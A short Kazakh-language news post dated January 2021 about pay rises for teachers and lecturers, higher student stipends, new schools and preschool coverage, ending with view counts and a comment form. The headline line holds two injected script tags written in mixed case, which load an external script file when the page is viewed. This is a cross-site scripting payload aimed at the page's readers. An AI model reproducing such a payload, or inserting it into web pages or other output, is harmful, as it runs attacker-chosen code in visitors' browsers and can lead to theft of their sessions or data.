2021 жылы педагогтердің жалақысы тағы да 25%-ға артады<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

05.01.2021

2021 жылы педагогтердің жалақысы тағы да 25%-ға артады

✅2020 жылы педагогтердің жалақысы 25%-ға өсті, 2021 жылы тағы да 25%-ға артады.

✅Ұстаздар сынып жетекшілігі, дәптер тексергені, магистратурада оқығаны үшін қосымша ақы алып жатыр.

✅Педагогикалық шеберлігі үшін колледж оқытушылары да жалақыдан 50%-ға дейінгі, ағылшын тілінде сабақ бергені үшін жалақының 200%-на дейінгі мөлшерде үстемақы алып жатыр.

✅Мемлекеттік ЖОО оқытушыларының жалақысы 20%-ға, ұлттық ЖОО оқытушыларының жалақысы 28%-ға өсті.

✅Колледжде, ЖОО-да және жоғары оқу орнынан кейінгі білім алып жатқан студенттердің стипендиялары 25%-ға ұлғайды. Ал педагогикалық мамандықтар бойынша оқитын студенттердің шәкіртақысы 26 мыңнан 42 000 теңгеге дейін, докторанттардың шәкіртақысы 82 мыңнан 150 000 теңгеге дейін өсті.

✅2020 жылы 100-ге жуық мектеп салынды. 

✅Елімізде балаларды мектепке дейінгі біліммен қамту 98,5% құрайды. 2020 жылы 362 мектепке дейінгі білім беру ұйымы ашылды.

@edu_news_qz

Просмотров: 543


Пікір қосу



Деректерді қолтаңбаға қосу